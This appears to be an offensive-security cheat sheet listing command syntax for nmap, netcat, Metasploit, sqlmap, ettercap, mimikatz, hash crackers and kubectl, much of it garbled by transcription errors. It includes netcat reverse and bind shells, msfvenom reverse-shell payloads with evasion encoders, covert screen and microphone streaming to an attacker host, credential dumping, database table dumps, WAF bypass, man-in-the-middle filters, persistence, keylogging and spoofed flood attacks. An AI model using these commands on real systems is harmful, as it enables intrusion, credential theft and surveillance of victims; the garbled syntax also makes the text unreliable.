Tool Syntax

How to use the tools

Nmap command

Scanning methods

Switch Explanation


Scan with ping


Scanning with syn


Scanning with connection


Scanning with udp


Scanning with protocol


Scanning along with versions


Scanning with traceroute

-T4 Setting the scanning speed between 0 and 5


Scanning output with all formats

-iL list.txt

Scan the contents of the list


Switch Explanation

-ox file

Write inside the xml file

-oG file

Writing inside the grep file

-oA file

Storage with 3 formats

-iL file

Reading hosts from inside my file

-exclude file file

Except for the hosts in the file

Advanced features

Switch Explanation

-sV -p –script=banner



Draw a route map


ttl code



Firewall evasion

Switch Explanation


Crossed fasteners

-s ip

source spoof

-g #

spoof source port

-D ip , ip


–mtu #

Setting the MTU size

–spoof-mac mac

spoof mac address

–data-length size


–scan-delay script



Determining the minimum number of requests sent per second

Convert xml output to html

xsltproc nmap.xml -o nmap.html

Create active hosts

nmap -sP -n -oX out.xml | grep "Nmap" | cut -d " " -f
5 live hosts.txt

Compare nmap results

ndiff scanl.xml scan2.xml

reverse dns lookup in ip range

nmap -R -sL -dns-server server

ids test (xmas scan with ips bait and spoofing)

for x in {1 .. lOOOO .. 1);do nmap -T5 -sX -S spoof-source-IP -D
comma-separated with no spaces list of decoy IPs --spoof-mac aa:bb:cc:dd:ee:ff
-e eth0 -Pn targeted-IP. Done

List of nmap scripts


List of shared routes smb-enum-shares.nse

Wireshark software

Filter Explanation




Password RIP

ip.addr/ip.dst/ip.src (ipv6.)



TCP ports

tcp.flags (ack,fin,push,reset,syn,urg)

TCP flags


UDP ports


Basic authentication authentication


Authentication of HTTP authentication

HTTP data


HTTP cookies


HTTP referrer path


HTTP servers

http.user agent

The user-agent section in HTTP

wlan.fc.type eq 0

802.11 management frame

wlan.fc.type eq 1

802.11 control frame

wlan.fc.type eq 0

802.11 data frames

wlan.fc.type subtype eq 0 (1=reponse)

802.11 association request

wlan.fc.type_subtype eq 2 (3=response)

802.11 reassociation req

wlan.fc.type_subtype eq 4 (5=response)

802.11 probe request

wlan.fc.type_subtype eq 8

802.11 beacon

wlan.fc.type subtype eq 10

802.11 disassociate

wlan.fc.type=subtype eq 11 (12=deauthenticate)

802.11 authentication

Command operators

eq OR ==
ne OR !=
gt OR
Lt. OR
ge OR =
le OR =

Logical operators

and OR &&
or OR ||
xor OR ^^
not OR!

Netcat command


Connect to [TargetiP] Listener on [port]:
$ nc [Target P] [port]

Start Listener:
$ nc -1 -p [port]

Start HTTP SOCKS server at Automation-Server

./ncat - l 3128 -proxy -type http &

Scan ports

TCP Port Scanner in port range [startPort] to [endPort]:
$ nc -v -n -z -wl [TargetiP] [startPort]-[endPort]

transfer files

send file
nc.exe < "file.log"

download file
nc -vnlp 1234 > file.txt
Grab a [filename] from a Listener:
1. Start Listener to push [filename]
     $ nc -1 -p [port] [filename]
2. Connect to [TargetiP] and Retrieve [filename]
     $ nc -w3 [TargetiP] [port] [filename]

Push a [filename] to Listener:
1. Start Listener to pull [filename]
     $ nc -1 -p [port] [filename]
2. Connect to [TargetiP] and push [filename]
     $nc -w3 [TargetiP] [port] [filename]

Backdoor shells

Linux Shell:
$ nc -1 -p [port] -e /bin/bash
Linux Reverse Shell:
$ nc [LocaliP] [port] -e /bin/bash
Windows Shell:
$ nc -1 -p [port] -e cmd.exe
Windows Reverse Shell:
$ nc [LocaliP] [port] -e cmd.exe

Use VLC for streaming

Use cvlc \(command line VLC\) on target to migrate popups

Saving and streaming the screen through the udp protocol to the attacker’s address and port 1234

# Start a listener on the attacker machine
vlc udp://@:1234

-- OR --

# Start a listener that stores the stream in a file.
vlc udp://@:1234 :sout=#transcode{vcodec=h264,vb=O,scale=O,acodec=mp4a,
ab=128,channels=2,samplerate=44100):file{dst=test.mp4) :no-sout-rtp-sap
:no-shout-standard-sap :ttl=1 :shout-keep

# This may make the users screen flash. Lower frame rates delay the video.
vlc screen:// :screen-fps=25 :screen-caching=100
plerate=44100):udp{dst=attackerip :1234) :no-sout-rtp-sap :no-soutstandard-
sap :ttl=1 :sout-keep

Save and stream the screen in http protocol

# Start a listener on the attacker machine

-- OR --

# Start a listener that stores the stream to a file
vlc -sout=#

# Start streaming on the target machine
vlc screen:// :screen-fps=25 :screen-caching=100
plerate=44100):http{mux=ffmpeg{mux=flv),dst=:8080/) :no-sout-rtp-sap :nosout-
standard-sap :ttl=1 :sout-keep

Save and stream on broadcast

# Start a listener on attacker machine for multicast
vlc udp://@ multicastaddr :1234

# Broadcast stream to a multicast address
vlc screen:// :screen-fps=25 :screen-caching=100
plerate=44100):udp{dst= multicastaddr :1234) :no-sout-rtp-sap :no-soutstandard-
sap :ttl=1 :sout-keep

Save and record the screen in a file

vlc screen:// :screen-fps=25 :screen-caching=100
plerate=44100):file{dst=C:\\Program Files (x86)\\VideoLAN\\VLC\\test.mp4)
:no-sout-rtp-sap :no-sout-standard-sap :ttl=1 :sout-keep

Record and stream microphone on udp

vlc dshow:// :dshow-vdev="None" :dshow-adev="Your Audio Device"

SSH command

/etc/ssh/ssh known hosts #System-wide known hosts
-/.ssh/known_hosts #Hosts user has logged into
sshd-generate #Generate SSH keys (DSA/RSA)
ssh keygen -t dsa -f /etc/ssh/ssh_host_dsa_key #Generate SSH DSA keys
ssh keygen -t rsa -f /etc/ssh/ssh_host_rsa_key #Generate SSH RSA keys

If already in ssh session, press SHIFT -C to configure tunnel
Port forwarding must be allowed on the target
/etc/ssh/sshd_config - AllowTcpForwarding YES

Connect with ssh with specific port

ssh root@ -p 8222

Reverse port forwarding using the tunnel (in the support user reverse shell)

ssh -R 4446: master@
http 4446

Set x11 victim to attacker

vi -/.ssh/config- Ensure 'ForwardXll yes'
ssh -X root@

Create port forward on port 8080 and transfer to port 443 of the attacker

ssh -R8080:12-.0.0.1:443 root@

Using port forward on the attacker’s port 8080 and transferring information using ssh tunnel and port 3300

ssh -18080: root@

Dynamic tunnel using proxychain. Also, the file /etc/proxychain.conf to set the port (1080)

ssh -D1080 root@
In a separate terminal run:
proxychains nmap -sT -p80,443

Create multi-hop ssh tunnel

ssh -L 8888: 50mctf@MY_VPS
ssh -v -o PubkeyAuthentication=no -o PreferredAuthentications=password -o GatewayPorts=yes -fN -R *:8444: 50mctf@MY_VPS

Metasploit software


msfconsole r file.rc

Load resource file

msfcli | grep exploit/window

List of Windows exploits

rnsfencode -l

list of encodes

msfpayload -h

List of payloads

show exploits

Display exploits

show auxiliary

show auxiliary module

show payloads

Show payloads

search string

Search for a specific string

search exploit string

Search exploits

searchsploit -m exploits/php/webapps/

Copy the Xploit file in the current path

info module

Display module information

use module

Load Xploit or Module

show options

Display module properties

show advanced

Show advanced settings

set option value

Set value

sessions -v

List of meetings: -k # (delete) -u # (Update Meterpreter)

sessions -s script

Run the Meterpreter script in all sessions

jobs -l

List all jobs (-k # - kill)

exploit -j

Run exploit as job

route add ip nmask sid

Rotation or Pivoting

loadpath /home/modules

Load tradeparty tree


shell ruby implementation

connect -s ip 443

connect to ssl (NC clone)

route add ip mask session id

added route ·in the pivot

exploit/multi/handler - set ExitOnSession False

Show more settings


set ConsoleLogging true (also


Enable reporting

Sqlmap command

Send request Get -u "http://url?id=1&str=val"

Send Post request -u "http://url" --data="id=1&str=val"

SQL injection in a specific parameter and knowing the type of database -u "http://url" --data="id=l&str=val" -p "id"
-b --dbms="mssqllmysqlloraclelpostgres"

SQL injection on the page requiring authentication

1. Login and note cookie value (cookie1=val1, cookie2=val2) -u "http:// url "--data="id=l&str=val" -p "id"

SQL injection and getting the database version and its name and user

./ -u "http://url" --data="id=1&str=val" -p "id" -b --current-db

SQL injection and get database tables db=testdb -u "http://url" --data="id=1&str=val" -p "id" --tables -D

SQL injection and receiving table columns -u "http://url" --data="id=l&str=val" -p "id" --columns -T

Read from file -r req.txt

Get the records of the specified table from the specified database

sqlmap -r req -D openemr -T users_secure --dump

Using the delay technique

sqlmap -r req --technique=T

more info

Bypass waf with unicode

sqlmap -r json --tamper=charunicodeescape --dump --level=5 --risk=3 --dbs --columns


Creating meterpreter payload (for Linux: -t file -o callback)

./msfpayload windows/meterpreter/reverse tcp LHOST=ip LPORT=port R |
./msfencode -t exe -o callback.exe -e x86/shikata_ga nai -c 5

Create payload with bound meterpreter

./msfpayload windows/meterpreter/bind_tcp RP.OST=ip LPORT=port X

Creating a Java reverse shell

msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT=9999 -f WAR > exploit.war

Creating a reverse shell for Windows with msfvenom

msfvenom -p windows/shell_reverse_tcp lhost=ip lport=port -f exe --platform windows >reverse.exe

Generate encoded payload using msfvenom

./msfvenorn --payload windows/meterpreter/reverse~tcp --format exe
template calc.exe -k --encoder x86/shikata_ga_nai -i 5 LHOST=
LPORT=443 callback.exe

Start database msf (bt5=mysql,kali=postgresql)

/etc/rc.d/rc.mysqld start
msf db_create root:pass@localhost/metasploit
msf load db mysql
msf db connect root:pass@localhost/metasploit
msf db=import nmap.xml

--- Kali ---
# service postgresql start
# service metasploit start

return the shell (by default it will run notepad and injection)

msf use post/windows/manage/multi meterpreter inject
msf set IPLIST attack ip 
msf set LPORT callback port
msf set PIDLIST PID to inject, default creates new notepad
msf set PAYLOAD windows/meterpreter/reverse_tcp
msf set SESSION meterpreter session ID

Display the html banner in the internal network

msf route add ip/range netmask meterpreter ID
msf use post/multi/gather/ping sweep # Set options and run
msf use /auxiliary/scanner/portscan/tcp # Set options and run
msf hosts-u-S x.x.x -R #Searches for x.x.x.' and sets
msf use auxiliary/scanner/http/http version # Set options and run
msf services -v -p 80-S x.x.x -R - #Displays IPs x.x.x.' with port
#80 open





List of available commands


Display system information

p.s List of processes


List of available PID

upload file C:\Program Files\

Upload file

download file

Get the file

reg command

Interaction with the registry


Back to main user


Transfer to interactive shell

migrate PID

Change to another PID


The current process behind the background

keys can (start|stop|dump)

Start/stop/delete keylogger

execute -f cmd.exe -i

Run cmd.exe and interact with it

execute -f crnd.exe -i -H -t

Run cmd.exe as a hidden process and get all the tokens

has dump

Get all local hashes

run script

Running the script (/scripts/meterpreter)

port fwd [add I delete] -lL 443 -r -p 3389

Create port forward on port 3389 in the current session and remote desktop access on port 443

Increasing access level

use priv

Impersonation token (removing the token will stop impersonation)

use incognito
list tokens -u
impersonate token domain\\user

Using nmap in meterpreter socks proxy

1. msf sessions #Note Meterpreter ID
2. msf route add id
3. msf use auxiliary/server/socks4a
4. msf run
5. Open a new shell and edit /etc/proxychains.conf
i. #proxy_dns
ii. #socks4 9050
iii. socks4 1080
6. Save and close the conf file
7. proxychains nmap -sT -Pn -p80,:35,s45
meterprete irb

Creating a stable Windows service

msf use post/windows/manage/persistence
msf set LHOST attack ip
msf set LPORT callback port
msf set REXENAHE filename
msf set SESSION meterpreter session id
meterpreter run post/windows/gather/dumplinks

Create a new process and command tree c:\

execute -H -f cmd.exe -a '/c tree /F /A c:\ C:\temp\tree.txt'

Ettercap software

Main-In-Middle attack using filters

ettercap.exe -I iface -M arp -Tq -F file.ef MACs / IPs / Ports
MACs / IPs / Ports
#i.e.: // 80,443 // = any MAC, any IP, ports 80,443

Main-In-Middle attack on subnet with functional fitters

ettercap -T -M arp -F filter // //

Switch flood attack

ettercap -TP rand flood

Ettercap filters

Compile ettercap filters

etterfilter filter.filter -o out.ef

Example filter - remove vpn traffic and decrypt http traffic

if lip.proto == UDP && udp.dst == 500) I
     kill(); }
if I ip.src == 'ip' ) (
     if (tcp.dst == 80) (
         if (search(, "Accept-Encoding")) (
             msg("Replaced Encoding\n");

Mimikatz command

1. Upload mimikatz.exe and sekurlsa.dll to target
2. execute mirnikatz
3. mimikatz# privilege: :debug
4. mimikatz# injeet::proeess lsass.exe securlsa.dll
5. mimikatz# @getLogonPasswords
6. securlsa::minidump /users/redteam/Desktop/lsass.DMP
7. securlsa::LogonPasswords


mimikatz# sekurlsa::tickets /export
mimikatz# kerberos::ptt <TICKET PATH>


#cleartext password and hash
.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "token::elevate" "lsadump::secrets" "exit"

Hping command3

hping3 targetiP --flood --frag --spoof ip --destport # --syn

Arping command

./arping -I eth# -a # arps

Wine command

ed /root/.wine/drive e/HinGW/bin
wine gee -o file.exe /tmp/ eode.e
wine file.exe

Grub software

GRUB Henu: Add 'single' end of kernel line. Reboot. Change root password. reboot

Hydra command

hydra -1 ftp -P words -v targetiP ftp

hashcat software

NTLMv2 crack

hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt --force

John the ripper software

Crack with word list

$ ./john -wordfile:pw.lst -format: format hash.txt

Sample formats

$ john --format~des    username:SDbsuge8iC58A
$ john --format~lm     username:$L~$a9c604d244c4e99d
$ john --format~md5    $1$12345678$aiccj83HRD8o6ux1bVx7D1

$ john --format~raw-sha1 A9993E364706816A8A3E25717850C26C9CDOD89D

# For --format~netlmv2 replace $NETLM with $NETLMv2
$ john --format~netlm

# Exactly 36 spaces between USER and HASH (SAP8 and SAPG)
$ john --format~sapb
ROOT    $8366A4E9E68"2C80
username:ROOT    $8366A4E9E68"2C80

$ john --format=sapg
ROOT $1194E38F1489F3F8DA18181F14DE8"0E"8DCC239

$ john --format=sha1-gen

$ john --format=zip

List of passwords

Creating different words based on one word

#Add lower(@), upper(,), ~umber(%), and symbol(^) I to the end of the word
crunch 12 12 -t baseword@,%^ wordlist.txt

Use custom special character set and add 2 numbers then special character
maskprocessor -custom-charset1=\!\@\#\$ baseword?d?d?l wordlist.txt

generate wordlist from website with number
cewl -d 5 -m 3 -w wordlist http://fuse.fabricorp.local/papercut/logs/html/index.htm --with-numbers

Vsown command

1. Download:
2. Create a new Shadow Copj
     a. cscript vssown.vbs /start (optional)
     b. cscript vsown.vbs /create
3. Pull the following files frorr. a shadow copj:
     a. Copy
b. copj
     C. COpj
4. Copj files to attack box.
5. Download tools:
6. Configure and Make source code for libesedb from the extracted package
     a. cd libesdb
     b. chmod +x configure
     c. ./configure && make
Use esedbdumphash to extract the data table from ntds.dit.
     a. cd esedbtools
     b. . I esedbdumphash ../../ntds.dit

File hash

Hash length

MD5 16 bytes
SHA-1 20 bytes
SHA-256 32 bytes
SHA-512 64 bytes

Software with different hash databases
# dig +short md5 TXT
Result = "filename I source" i.e. "cmd.exe I NIST"

Malware hash database
# dig +short [MD5|SHA-1] TXT
Result = last seen timestamp AV detection rate
Convert timestamp= perl-e 'print scalar localtime( timestamp ), "\n"'

Search in metadata files

Search the virustotal database

Guess the password of the zip file

fcrackzip -v -D -u -p /usr/share/wordlists/rockyou.txt

Guess the password of the winrm service

crackmapexec winrm <IPS> -u <USERS> -p <PASSWORDS>

Guess the password of the smb service

crackmapexec smb <IP> -u <USER> -p <PASS> --shares

Connect to mssql with impackt -port 1433 sa@

powershell download files

powershell iwr -usebasicparsing -OutFile mimikatz.exe

List of Pods

𝑘𝑢𝑏𝑒𝑐𝑡𝑙 𝑔𝑒𝑡 𝑝𝑜𝑑

Check if you have rights to exec into any pods

./𝑘𝑢𝑏𝑒𝑐𝑡𝑙 𝑎𝑢𝑡ℎ 𝑐𝑎𝑛 − 𝑖 𝑒𝑥𝑒𝑐 𝑝𝑜𝑑𝑠

exec into sensitive-pod

./𝑘𝑢𝑏𝑒𝑐𝑡𝑙 𝑒𝑥𝑒𝑐 − 𝑖𝑡 𝑠𝑒𝑛𝑠𝑖𝑡𝑖𝑣𝑒 − 𝑝𝑜𝑑 /𝑏𝑖𝑛/𝑏𝑎𝑠ℎ

More information about the environment

kubectl get nodes -o wide


Discover Devices

python -m discovery

Scan for vulnerabilities

python -m vulnerability

Brute Force

python -m bruteforce

Exploit vulnerabilities

python -m exploit

Generate Payloads

python -m payloads


python -m sniffer

Dos Attacks

python -m dos

Password Attacks

python -m password

Shodan Integration

python -m shodan

Last updated